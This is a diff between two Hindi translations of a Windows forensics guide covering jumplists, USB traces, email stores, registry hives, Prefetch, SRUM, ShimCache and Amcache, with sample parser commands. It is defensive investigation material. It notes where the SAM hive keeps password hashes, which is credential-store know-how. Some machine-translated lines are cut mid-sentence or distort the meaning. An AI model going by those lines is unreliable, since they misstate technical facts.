`C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\` में संग्रहित होते हैं। जम्पलिस्ट्स का नाम `{id}.autmaticDestinations-ms` नामक प्रारूप का होता है जहाँ प्रारंभिक आईडी एप्लिकेशन का आईडी होता है। -कस्टम जम्पलिस्ट्स `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` में संग्रहित होती हैं और इन्हें एप्लिकेशन द्वारा सामान्यत: कुछ **महत्वपूर्ण** घटना होने के कारण बनाया जाता है (शायद पसंदीदा के रूप में चिह्नित किया गया हो) +कस्टम जम्पलिस्ट्स `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` में संग्रहित होती हैं और उन्हें एप्लिकेशन द्वारा सामान्यत: इसलिए बनाया जाता है क्योंकि कुछ **महत्वपूर्ण** घटना फ़ाइल के साथ हुई है (शायद पसंदीदा के रूप में चिह्नित किया गया हो) किसी भी जम्पलिस्ट का **निर्माण समय** दर्शाता है **फ़ाइल तक पहुँचने का पहला समय** और **संशोधित समय** अंतिम बार। @@ -128,11 +129,11 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs ![](<../../../.gitbook/assets/image (474).png>) -(_कृपया ध्यान दें कि JumplistExplorer द्वारा प्रदान की गई समय चिह्नित जम्पलिस्ट फ़ाइल से संबंधित हैं_) +(_कृपया ध्यान दें कि JumplistExplorer द्वारा प्रदान की गई समय चिह्नित किए गए वक्त संबंधित होते हैं_) ### शेलबैग्स -[**इस लिंक पर जाएं और जानें कि शेलबैग्स क्या हैं।**](interesting-windows-registry-keys.md#shellbags) +[**इस लिंक पर जानें कि शेलबैग्स क्या हैं।**](interesting-windows-registry-keys.md#shellbags) ## Windows USB का उपयोग @@ -142,7 +143,7 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs * Microsoft Office हाल की फ़ोल्डर * जम्पलिस्ट्स -ध्यान दें कि कुछ LNK फ़ाइल मूल पथ की बजाय WPDNSE फ़ोल्डर को इंगित करती हैं: +ध्यान दें कि कुछ LNK फ़ाइल मूल पथ की बजाय, WPDNSE फ़ोल्डर को पॉइंट करती हैं: ![](<../../../.gitbook/assets/image (476).png>) @@ -150,13 +151,13 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs ### रजिस्ट्री सूचना -[जानने के लिए इस पृष्ठ की जाँच करें](interesting-windows-registry-keys.md#usb-information) कि कौन सी रजिस्ट्री कुंजीयाँ USB कनेक्टेड डिवाइस के बारे में दिलचस्प जानकारी रखती हैं। +[जानने के लिए इस पेज की जाँच करें](interesting-windows-registry-keys.md#usb-information) कि कौन सी रजिस्ट्री कुंजीयाँ USB कनेक्टेड डिवाइस के बारे में दिलचस्प सूचना रखती हैं। ### setupapi USB कनेक्शन किया गया था कब हुआ यह जानने के लिए फ़ाइल `C:\Windows\inf\setupapi.dev.log` की जाँच करें (खोज करें `Section start`). -![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>) +![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>) ### USB डिटेक्टिव @@ -166,20 +167,20 @@ USB कनेक्शन किया गया था कब हुआ यह ### प्लग और प्ले सफाई -'प्लग और प्ले सफाई' नामक निर्धारित कार्य को पुराने ड्राइवर संस्करणों को हटाने के लिए प्राथमिक रूप से डिज़ाइन किया गया है। नवीनतम ड्राइवर पैकेज संस्करण को बनाए रखने के उसके निर्दिष्ट उद्देश्य के विपरीत, ऑनलाइन स्रोत सुझाव देते हैं कि यह 30 दिनों के लिए निष्क्रिय रहे ड्राइवर्स पर भी निशाना साधता है। इस परिणामस्वरूप, पिछले 30 दिनों में कनेक्ट नहीं किए गए हटाए जा सकते हैं। +'प्लग और प्ले सफाई' नामक निर्धारित कार्य कारीय अपडेटेड ड्राइवर संस्करणों को हटाने के लिए प्रधान रूप से डिज़ाइन किया गया है। इसके निर्दिष्ट उद्देश्य के विपरीत, ऑनलाइन स्रोत सुझाव देते हैं कि यह 30 दिनों के लिए निष्क्रिय रहे ड्राइवर्स को भी लक्षित करता है। इसके परिणामस्वरूप, पिछले 30 दिनों में कनेक्ट नहीं किए गए हटाए जा सकते हैं। -कार्य से संबंधित निम्नलिखित पथ पर स्थित है: +कार्य का स्थान निम्नलिखित पथ पर है: `C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`. -कार्य की सामग्री का चित्र प्रदर्शित किया गया है: +कार्य की सामग्री का चित्र प्रदान किया गया है: ![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png) **कार्य के मुख्य घटक और सेटिंग्स:** - **pnpclean.dll**: यह DLL वास्तविक सफाई प्रक्रिया के लिए जिम्मेदार है। - **UseUnifiedSchedulingEngine**: `TRUE` पर सेट किया गया है, जो सामान्य कार्य निर्धारण इंजन का उपयोग करने की संकेत करता है। - **MaintenanceSettings**: -- **अवधि ('P1M')**: कार्य सूचीकरणकर्ता को नियमित स्वचालित रूप से मासिक सफाई कार्य आरंभ करने के लिए निर्देशित करता है। -- **समयसीमा ('P2M')**: यदि कार्य दो लगातार महीनों के लिए विफल हो जाता है, तो टास्क स्केड्यूलर को आपातकालीन स्वचालित रूप से मासिक सफाई कार्य को करने के लिए निर्देशित करता है। +- **अवधि ('P1M')**: कार्य सूचीकरणकर्ता को नियमित ऑटोमैटिक रखरखाव के दौरान मासिक सफाई कार्य आरंभ करने के लिए निर्देशित करता है। +- **समयसीमा ('P2M')**: यदि कार्य दो लगातार महीनों के लिए विफल हो जाता है, तो टास्क स्केड्यूलर को आपात सफाई कार्य करने के लिए निर्देशित करता है। यह विन्यास ड्राइवरों की नियमित रखरखाव और सफाई सुनिश्चित करता है, जो लगातार विफलताओं के मामले में कार्य को पुनः प्रयास करने के लिए प्रावधान करता है। @@ -187,75 +188,75 @@ USB कनेक्शन किया गया था कब हुआ यह ## ईमेल -ईमेल में **2 दिलचस्प भाग होते हैं: हेडर्स और सामग्री**। **हेडर्स** में आप जानकारी पा सकते हैं जैसे: +ईमेल में **2 दिलचस्प हिस्से होते हैं: हेडर्स और सामग्री**। **हेडर्स** में आप जानकारी पा सकते हैं जैसे: -* **कौन** ईमेल भेजा (ईमेल पता, आईपी, ईमेल को पुनर्निर्देशित करने वाले मेल सर्वर) +* **कौन** ईमेल भेजा (ईमेल पता, आईपी, मेल सर्वर जिन्होंने ईमेल को पुनर्निर्देशित किया हो) * **कब** ईमेल भेजा गया था -इसके अलावा, `References` और `In-Reply-To` हेडर्स में आप मेसेज की आईडी पा सकते हैं: +इसके अलावा, `References` और `In-Reply-To` हेडर्स में आप संदेशों का आईडी पा सकते हैं: ![](<../../../.gitbook/assets/image (484).png>) -### Windows मेल ऐप +### Windows Mail App -यह एप्लिकेशन ईमेल को HTML या पाठ में सहेजता है। आप ईमेल को नीचे उपफ़ोल्डर में पा सकते हैं `\Users\\AppData\Local\Comms\Unistore\data\3\`। ईमेल `.dat` एक्सटेंशन के साथ सहेजे जाते हैं। +यह एप्लिकेशन ईमेल को HTML या पाठ में सहेजता है। आप ईमेल को ढूंढ सकते हैं `\Users\\AppData\Local\Comms\Unistore\data\3\` के अंदर सबफ़ोल्डर्स में। ईमेल `.dat` एक्सटेंशन के साथ सहेजे जाते हैं। -ईमेलों की **मेटाडेटा** और **संपर्क** को **EDB डेटाबेस** में पाया जा सकता है: `\Users\\AppData\Local\Comms\UnistoreDB\store.vol` +ईमेलों की **मेटाडेटा** और **संपर्क** को **EDB डेटाबेस** के अंदर पाया जा सकता है: `\Users\\AppData\Local\Comms\UnistoreDB\store.vol` -फ़ाइल का एक्सटेंशन **बदलें** `.vol` से `.edb` और आप इसे खोलने के लिए उपकरण [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) का उपयोग कर सकते हैं। `Message` टेबल के अंदर आप ईमेल देख सकते हैं। +फ़ाइल का एक्सटेंशन **बदलें** `.vol` से `.edb` और आप इसे खोलने के लिए उपकरण [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) का उपयोग कर सकते हैं। `Message` तालिका के अंदर आप ईमेल देख सकते हैं। ### Microsoft Outlook जब Exchange सर्वर या Outlook क्लाइंट का उपयोग किया जाता है तो कुछ MAPI हेडर्स होते हैं: * `Mapi-Client-Submit-Time`: ईमेल भेजे जाने का समय -* `Mapi-Conversation-Index`: थ्रेड के बच्चों की संख्या और हर मेसेज के समय का चिन्हांक -* `Mapi-Entry-ID`: मेसेज पहचानकर्ता। -* `Mappi-Message-Flags` और `Pr_last_Verb-Executed`: MAPI क्लाइंट के बारे में जानकारी (मेसेज पढ़ा गया? पढ़ा नहीं गया? प्रतिक्रिया दी गई? पुनर्निर्देशित किया गया? बाहर ऑफिस?) +* `Mapi-Conversation-Index`: थ्रेड के बच्चों के संदेशों की संख्या और प्रत्येक संदेश का समयचिह्न +* `Mapi-Entry-ID`: संदेश पहचानकर्ता। +* `Mappi-Message-Flags` और `Pr_last_Verb-Executed`: MAPI क्लाइंट के बारे में जानकारी (संदेश पढ़ा गया? पढ़ा नहीं गया? प्रतिक्रिया दी गई? पुनर्निर्देशित किया गया? आफिस से बाहर?) -Microsoft Outlook क्लाइंट में +Microsoft Outlook क्लाइंट में, सभी भेजे गए/प्राप्त किए गए सं ### Microsoft Outlook OST Files -एक **OST फ़ाइल** Microsoft Outlook द्वारा उत्पन्न की जाती है जब यह **IMAP** या **Exchange** सर्वर के साथ कॉन्फ़िगर किया जाता है, जो एक PST फ़ाइल के समान जानकारी संग्रहित करती है। यह फ़ाइल सर्वर के साथ समकलीन होती है, **पिछले 12 महीने** तक के डेटा को **अधिकतम 50GB** आकार तक रखती है, और PST फ़ाइल के समान निर्देशिका में स्थित है। एक OST फ़ाइल देखने के लिए, [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html) का उपयोग किया जा सकता है। +एक **OST फ़ाइल** Microsoft Outlook द्वारा उत्पन्न की जाती है जब यह **IMAP** या **Exchange** सर्वर के साथ कॉन्फ़िगर किया गया होता है, जो एक PST फ़ाइल के समान जानकारी संग्रहित करती है। यह फ़ाइल सर्वर के साथ समकलीन होती है, **पिछले 12 महीने** तक के डेटा को **अधिकतम 50GB** आकार तक रखती है, और PST फ़ाइल के समान निर्देशिका में स्थित है। एक OST फ़ाइल देखने के लिए, [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html) का उपयोग किया जा सकता है। ### अटैचमेंट पुनः प्राप्त करना -खो गए अटैचमेंट को निम्नलिखित से पुनः प्राप्त किया जा सकता है: +खो गए अटैचमेंट को निम्नलिखित स्थान से पुनः प्राप्त किया जा सकता है: - **IE10 के लिए**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook` - **IE11 और ऊपर के लिए**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook` ### Thunderbird MBOX Files -**Thunderbird** डेटा संग्रहित करने के लिए **MBOX फ़ाइलें** का उपयोग करता है, जो `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles` में स्थित है। +**Thunderbird** MBOX फ़ाइलें डेटा संग्रहित करने के लिए उपयोग करता है, जो `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles` में स्थित है। ### छवि थंबनेल्स -- **Windows XP और 8-8.1**: थंबनेल्स के साथ एक फ़ोल्डर तक पहुँचने पर `thumbs.db` फ़ाइल उत्पन्न होती है जो छवि पूर्वावलोकन संग्रहित करती है, भले ही उसके हटाने के बाद भी। -- **Windows 7/10**: `thumbs.db` उत्पन्न होती है जब UNC पथ के माध्यम से नेटवर्क के माध्यम से पहुँचा जाता है। +- **Windows XP और 8-8.1**: थंबनेल्स के साथ एक फ़ोल्डर तक पहुँचने पर, एक `thumbs.db` फ़ाइल उत्पन्न होती है जो छवि पूर्वावलोकन संग्रहित करती है, भले ही उसे हटा दिया गया हो। +- **Windows 7/10**: `thumbs.db` उस समय उत्पन्न होती है जब यह एक नेटवर्क के माध्यम से UNC पथ के माध्यम से पहुँचा जाता है। - **Windows Vista और नएरे**: थंबनेल पूर्वावलोकन `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` में केंद्रीकृत है जिसमें फ़ाइलें **thumbcache\_xxx.db** नाम से होती हैं। [**Thumbsviewer**](https://thumbsviewer.github.io) और [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) इन फ़ाइलों को देखने के लिए उपकरण हैं। -### Windows रजिस्ट्री सूचना +### Windows रजिस्ट्री जानकारी -Windows रजिस्ट्री, विभिन्न `HKEY_LOCAL_MACHINE` उपकीजों के लिए फ़ाइलों में संग्रहित व्यापक सिस्टम और उपयोगकर्ता गतिविधि डेटा संग्रहित करता है: +Windows रजिस्ट्री, विस्तृत सिस्टम और उपयोगकर्ता गतिविधि डेटा संग्रहित करने वाला है, निम्नलिखित फ़ाइलों में समाहित है: -- विभिन्न `HKEY_LOCAL_MACHINE` उपकीजों के लिए `%windir%\System32\Config` में। -- `HKEY_CURRENT_USER` के लिए `%UserProfile%{User}\NTUSER.DAT` में। -- Windows Vista और उसके बाद के संस्करण `%Windir%\System32\Config\RegBack\` में `HKEY_LOCAL_MACHINE` रजिस्ट्री फ़ाइलें बैकअप करते हैं। -- इसके अतिरिक्त, कार्यक्रम निष्पादन सूचना `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` में संग्रहित है Windows Vista और Windows 2008 सर्वर के बाद से। +- विभिन्न `HKEY_LOCAL_MACHINE` सबकीज के लिए `%windir%\System32\Config`। +- `HKEY_CURRENT_USER` के लिए `%UserProfile%{User}\NTUSER.DAT`। +- Windows Vista और उसके बाद के संस्करण ने `%Windir%\System32\Config\RegBack\` में `HKEY_LOCAL_MACHINE` रजिस्ट्री फ़ाइलों का बैकअप बनाया। +- इसके अतिरिक्त, कार्यक्रम निष्पादन जानकारी Windows Vista और Windows 2008 सर्वर के बाद से `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` में संग्रहित है। ### उपकरण कुछ उपकरण रजिस्ट्री फ़ाइलों का विश्लेषण करने के लिए उपयोगी हैं: -* **रजिस्ट्री संपादक**: यह Windows में स्थापित है। यह वर्तमान सत्र की Windows रजिस्ट्री में नेविगेट करने के लिए एक GUI है। -* [**रजिस्ट्री एक्सप्लोरर**](https://ericzimmerman.github.io/#!index.md): यह आपको रजिस्ट्री फ़ाइल लोड करने और उनमें नेविगेट करने की अनुमति देता है एक GUI के साथ। यह बुकमार्क्स शामिल करता है जो दिलचस्प जानकारी वाले कुंजियों को हाइलाइट करता है। +* **रजिस्ट्री संपादक**: यह Windows में स्थापित है। यह वर्तमान सत्र के Windows रजिस्ट्री में नेविगेट करने के लिए एक GUI है। +* [**रजिस्ट्री एक्सप्लोरर**](https://ericzimmerman.github.io/#!index.md): यह आपको रजिस्ट्री फ़ाइल लोड करने और उनमें नेविगेट करने की अनुमति देता है। यह बुकमार्क्स शामिल करता है जो दिलचस्प जानकारी वाले कुंजियों को हाइलाइट करता है। * [**RegRipper**](https://github.com/keydet89/RegRipper3.0): फिर से, इसमें एक GUI है जो लोड किए गए रजिस्ट्री में नेविगेट करने की अनुमति देता है और लोड किए गए रजिस्ट्री में दिलचस्प जानकारी को हाइलाइट करने वाले प्लगइन्स भी शामिल हैं। -* [**Windows रजिस्ट्री रिकवरी**](https://www.mitec.cz/wrr.html): एक और GUI एप्लिकेशन जो रजिस्ट्री से महत्वपूर्ण जानकारी निकालने की क्षमता रखता है। +* [**Windows रजिस्ट्री रिकवरी**](https://www.mitec.cz/wrr.html): एक और GUI एप्लिकेशन जो रजिस्ट्री से महत्वपूर्ण जानकारी निकालने में सक्षम है। ### हटाए गए तत्व को पुनः प्राप्त करना -जब एक कुंजी हटाई जाती है तो उसे ऐसा चिह्नित किया जाता है, लेकिन जब तक वह जगह जिसे वह धारण कर रही है आवश्यक नहीं होती, तब तक वह हटाया नहीं जाएगा। इसलिए, **रजिस्ट्री एक्सप्लोरर** जैसे उपकरण का उपयोग करके इन हटाए गए कुंजियों को पुनः प्राप्त किया जा सकता है। +जब एक कुंजी हटाई जाती है तो उसे ऐसा चिह्नित किया जाता है, लेकिन जब तक वह जगह जिसे यह धारण कर रही है उसकी आवश्यकता न हो, तब तक यह हटाया नहीं जाएगा। इसलिए, **रजिस्ट्री एक्सप्लोरर** जैसे उपकरण का उपयोग करके इन हटाए गए कुंजियों को पुनः प्राप्त किया जा सकता है। ### अंतिम लेखन समय @@ -263,9 +264,9 @@ Windows रजिस्ट्री, विभिन्न `HKEY_LOCAL_MACHINE` ### SAM -फ़ाइल/हाइव **SAM** में सिस्टम के **उपयोगकर्ता, समूह और उपयोगकर्ता पासवर्ड** हैश संग्रहित होते हैं। +फ़ाइल/हाइव **SAM** में सिस्टम के **उपयोगकर्ता, समूह और उपयोगकर्ता पासवर्ड** हैश होते हैं। -`SAM\Domains\Account\Users` में आप उपयोगकर्ता नाम, RID, अंतिम लॉगिन, अंतिम विफल लॉगिन, लॉगिन काउंटर, पासवर्ड नीति और खाता बनाया गया था की जानकारी प्राप्त कर सकते हैं। **हैश** प्राप्त करने के लिए आपको फ़ाइल/हाइव **SYSTEM** की भी **आवश्यकता** है। +`SAM\Domains\Account\Users` में आप उपयोगकर्ता नाम, RID, अंतिम लॉगिन, अंतिम विफल लॉगिन, लॉगिन काउंटर, पासवर्ड नीति और खाता बनाया गया था कब तक प्राप्त कर सकते हैं। **हैश** प्राप्त करने के लिए आपको फ़ाइल/हाइव **SYSTEM** की भी **आवश्यकता** है। ### Windows रजिस्ट्री में दिलचस्प प्रविष्टियाँ @@ -273,27 +274,27 @@ Windows रजिस्ट्री, विभिन्न `HKEY_LOCAL_MACHINE` [interesting-windows-registry-keys.md](interesting-windows-registry-keys.md) {% endcontent-ref %} -## निष्पादित कार्यक्रम +## कार्यक्रम निष्पादित ### मौलिक Windows प्रक्रियाएँ -[इस पोस्ट](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) में आप संदेहात्मक व्यवहार का पता लगाने के लिए सामान्य Windows प्रक्रियाओं के बारे में सीख सकते हैं। +[इस पोस्ट](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) में आप संदेहास्पद व्यवहार का पता लगाने के लिए सामान्य Windows प्रक्रियाओं के बारे में सीख सकते हैं। ### Windows हाल के APPs -रजिस्ट्री `NTUSER.DAT` में पथ `Software\Microsoft\Current Version\Search\RecentApps` में आप **निष्पादित एप्लिकेशन**, **अंतिम समय** जब यह निष्पादित किया गया था, और **कितनी बार** यह चलाया गया था के बारे में जानकारी संग्रहित करने वाली सबकीज हो सकती है। +रजिस्ट्री `NTUSER.DAT` में पथ `Software\Microsoft\Current Version\Search\RecentApps` में आप **एप्लिकेशन निष्पादित**, **अंतिम समय** जब यह निष्पादित किया गया था, और **कितनी बार** यह चलाया गया था के बारे में जानकारी वाले सबकीज प्राप्त कर सकते हैं। ### BAM (पृष्ठभूमि गतिविधि नियंत्रक) -आप रजिस्ट्री संपादक के साथ `SYSTEM` फ़ाइल खोल सकते हैं और पथ `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` में आप प्रत्येक उपयोगकर्ता द्वारा निष्पादित **एप्लिकेशन की जानकारी** (पथ में `{SID}` ध्यान दें) और **कब** वे निष्पादित किए गए थे (समय रजिस्ट्री के डेटा मान में होता है) प्राप्त कर सकते हैं। +आप रजिस्ट्री संपादक के साथ `SYSTEM` फ़ाइल खोल सकते हैं और पथ `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` में आप प्रत्येक उपयोगकर्ता द्वारा **निष्पादित एप्लिकेशन की जानकारी** (पथ में `{SID}` का ध्यान दें) और **कब** वे निष्पादित किए गए थे (समय रजिस्ट्री के डेटा मान में होता है) प्राप्त कर सकते हैं। ### Windows Prefetch -प्रीफेचिंग एक तकनीक है जो एक कंप्यूटर को चुपचाप **उसे आवश्यक संसाधन लाने की अनुमति देती है जो एक उपयोगकर्ता निकट भविष्य में पहुँच सकता है** ताकि संसाधन तेजी से पहुँचे जा सकें। +प्रीफेचिंग एक तकनीक है जो एक कंप्यूटर को चुपचाप **उन आवश्यक संसाधनों को लाने की अनुमति देती है जो एक उपयोगकर्ता निकट भविष्य में पहुँच सकता है** ताकि संसाधनों को तेजी से पहुँचा जा सके। Windows प्रीफेच में **निष्पादित कार्यक्रमों के कैश** बनाने से उन्हें तेजी से लोड करने की क्षमता होती है। ये कैशेज `.pf` फ़ाइलें बनाते हैं पथ में: `C:\Windows\Prefetch`। XP/VISTA/WIN7 में 128 फ़ाइलों की सीमा होती है और Win8/Win10 में 1024 फ़ाइलें होती हैं। -फ़ाइल नाम `{प्रोग्राम_नाम}-{हैश}.pf` के रूप में बनाई जाती है (हैश पथ और कार्यक्रम के तर्कों पर आधारित है)। W10 में ये फ़ाइलें संकुचित होती हैं। ध्यान दें कि फ़ाइल की केवल मौज +फ़ाइल का नाम `{प्रोग्राम_नाम}-{हैश}.pf` बनाया जाता है (हैश पथ और कार्यक्रम के तर्कों पर आधारित है)। W10 में ये फ़ाइलें संकुचित होती हैं। ध्यान दें कि फ़ाइल की केवल मौजूदगी इस बात का संक ```bash .\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder" ``` @@ -310,11 +311,11 @@ Windows प्रीफेच में **निष्पादित कार ### SRUM -**सिस्टम रिसोर्स यूज़ेज मॉनिटर** (SRUM) **प्रक्रिया द्वारा उपयोग किए गए संसाधनों** का **निगरानी** करता है। यह W8 में प्रकट हुआ और डेटा को `C:\Windows\System32\sru\SRUDB.dat` में स्थित एक ESE डेटाबेस में संग्रहित करता है। +**सिस्टम रिसोर्स उपयोग मॉनिटर** (SRUM) **प्रक्रिया द्वारा उपयोग किए गए संसाधनों** का **निगरानी** करता है। यह W8 में प्रकट हुआ और यह डेटा को `C:\Windows\System32\sru\SRUDB.dat` में स्थित एक ESE डेटाबेस में संग्रहित करता है। यह निम्नलिखित जानकारी प्रदान करता है: -* एप्लिकेशन आईडी और पथ +* ऐपआईडी और पथ * प्रक्रिया को चलाने वाला उपयोगकर्ता * भेजे गए बाइट्स * प्राप्त बाइट्स @@ -334,14 +335,14 @@ Windows प्रीफेच में **निष्पादित कार - फ़ाइल का पूरा पथ - फ़ाइल का आकार -- Last Modified time under **$Standard\_Information** (SI) -- Last Updated time of the ShimCache -- Process Execution Flag +- **$Standard\_Information** (SI) के तहत अंतिम संशोधित समय +- ShimCache का अंतिम अपडेट समय +- प्रक्रिया निष्पादन ध्वज -Such data is stored within the registry at specific locations based on the version of the operating system: +ऐसे डेटा को रजिस्ट्री में रखा जाता है विशेष स्थानों पर आधारित होता है ऑपरेटिंग सिस्टम के संस्करण पर: -- For XP, the data is stored under `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` with a capacity for 96 entries. -- उपसर्वर 2003 के लिए, साथ ही Windows संस्करण 2008, 2012, 2016, 7, 8, और 10 के लिए, स्टोरेज पथ `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache` है, जिसमें 512 और 1024 एंट्री को समाहित किया गया है। +- XP के लिए, डेटा `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` के तहत संग्रहीत होता है जिसमें 96 एंट्री की क्षमता होती है। +- सर्वर 2003, साथ ही Windows संस्करण 2008, 2012, 2016, 7, 8, और 10 के लिए, स्टोरेज पथ `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache` होता है, जिसमें 512 और 1024 एंट्री की क्षमता होती है। संग्रहित जानकारी को पार्स करने के लिए, [**AppCompatCacheParser** टूल](https://github.com/EricZimmerman/AppCompatCacheParser) का उपयोग करना सुझावित है। @@ -349,15 +350,15 @@ Such data is stored within the registry at specific locations based on the versi ### Amcache -**Amcache.hve** फ़ाइल मुख्य रूप से एक रजिस्ट्री हाइव है जो एक सिस्टम पर निष्पादित की गई एप्लिकेशनों के विवरण को लॉग करता है। आमतौर पर यह `C:\Windows\AppCompat\Programas\Amcache.hve` पर पाया जाता है। +**Amcache.hve** फ़ाइल मूल रूप से एक रजिस्ट्री हाइव है जो एक सिस्टम पर निष्पादित की गई एप्लिकेशनों के बारे में विवरण लॉग करता है। यह सामान्यत: `C:\Windows\AppCompat\Programas\Amcache.hve` पर पाया जाता है। -यह फ़ाइल हाल ही में निष्पादित प्रक्रियाओं के रिकॉर्ड संग्रहित करने के लिए महत्वपूर्ण है, जिसमें निष्पादनीय फ़ाइलों के पथ और उनके SHA1 हैश शामिल हैं। यह जानकारी सिस्टम पर एप्लिकेशनों की गतिविधि का ट्रैकिंग करने के लिए अमूल्य है। +यह फ़ाइल हाल ही में निष्पादित प्रक्रियाओं के रिकॉर्ड संग्रहित करने के लिए प्रमुख है, जिसमें निष्पादनी फ़ाइलों के पथ और उनके SHA1 हैश शामिल हैं। यह जानकारी सिस्टम पर एप्लिकेशनों की गतिविधि का ट्रैकिंग करने के लिए अमूल्य है। -**Amcache.hve** से डेटा निकालने और विश्लेषण करने के लिए, [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) टूल का उपयोग किया जा सकता है। निम्नलिखित कमांड एक उदाहरण है कि AmcacheParser का उपयोग कैसे किया जाए **Amcache.hve** फ़ाइल की सामग्री को पार्स करने और परिणामों को CSV प्रारूप में निकालने के लिए: +**Amcache.hve** से डेटा निकालने और विश्लेषण करने के लिए, [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) टूल का उपयोग किया जा सकता है। निम्नलिखित कमांड एक उदाहरण है कि AmcacheParser का उपयोग कैसे किया जाता है **Amcache.hve** फ़ाइल की सामग्री को पार्स करने और परिणामों को CSV प्रारूप में आउटपुट करने के लिए: ```bash AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder ``` -में उत्पन्न CSV फ़ाइलों में, `Amcache_Unassociated file entries` विशेष रूप से महत्वपूर्ण है क्योंकि यह असंबद्ध फ़ाइल प्रविष्टियों के बारे में विविध जानकारी प्रदान करता है। +में उत्पन्न CSV फ़ाइलों में, `Amcache_Unassociated file entries` विशेष रूप से महत्वपूर्ण है क्योंकि यह असंबद्ध फ़ाइल प्रविष्टियों के बारे में विस्तृत जानकारी प्रदान करता है। सबसे दिलचस्प CVS फ़ाइल जो उत्पन्न होती है, वह है `Amcache_Unassociated file entries`। @@ -377,40 +378,68 @@ AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\gen ### **Windows Store** -स्थापित एप्लिकेशन `\ProgramData\Microsoft\Windows\AppRepository\` में पाए जा सकते हैं। -इस भंडार में एक **लॉग** है जिसमें प्रत्येक एप्लिकेशन की स्थापना की गई है जो तंत्र में है डेटाबेस **`StateRepository-Machine.srd`**। +स्थापित एप्लिकेशन `\ProgramData\Microsoft\Windows\AppRepository\` में पाई जा सकती हैं। +इस भंडार में एक **लॉग** है जिसमें प्रत्येक एप्लिकेशन की स्थापना की गई है जो डेटाबेस **`StateRepository-Machine.srd`** के अंदर सिस्टम में। -इस डेटाबेस के एप्लिकेशन तालिका में, "एप्लिकेशन आईडी", "पैकेज नंबर", और "प्रदर्शन नाम" मिल सकते हैं। ये स्तंभ पूर्व स्थापित और स्थापित एप्लिकेशनों के बारे में जानकारी रखते हैं और यह पता लगाया जा सकता है कि क्या कुछ एप्लिकेशन अनइंस्टॉल किए गए थे क्योंकि स्थापित एप्लिकेशनों के आईडी सतत होने चाहिए। +इस डेटाबेस के एप्लिकेशन तालिका के अंदर, "एप्लिकेशन आईडी", "पैकेज नंबर", और "प्रदर्शन नाम" पाए जा सकते हैं। ये स्तंभ पूर्व स्थापित और स्थापित एप्लिकेशनों के बारे में जानकारी रखते हैं और यह पता लगाया जा सकता है कि क्या कुछ एप्लिकेशन अनइंस्टॉल किए गए थे क्योंकि स्थापित एप्लिकेशनों के आईडी सतत होने चाहिए। -रजिस्ट्री पथ में भी स्थापित एप्लिकेशन पाए जा सकते हैं: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\ +रजिस्ट्री पथ के अंदर भी **स्थापित एप्लिकेशन** पाए जा सकते हैं: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\ और **अनइंस्टॉल** **एप्लिकेशन** में: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\` -## Windows घटनाएँ +## Windows घटनाएं -Windows घटनाओं में जो जानकारी दिखाई देती है: +Windows घटनाओं के अंदर जो जानकारी आती है: * क्या हुआ * टाइमस्टैम्प (UTC + 0) * शामिल हुए उपयोगकर्ता * शामिल हुए होस्ट (होस्टनाम, आईपी) -* पहुंचे गए संपत्तियाँ (फ़ाइलें, फ़ोल्डर, प्रिंटर, सेवाएँ) +* एसेट्स तक पहुंचा (फ़ाइलें, फ़ोल्डर, 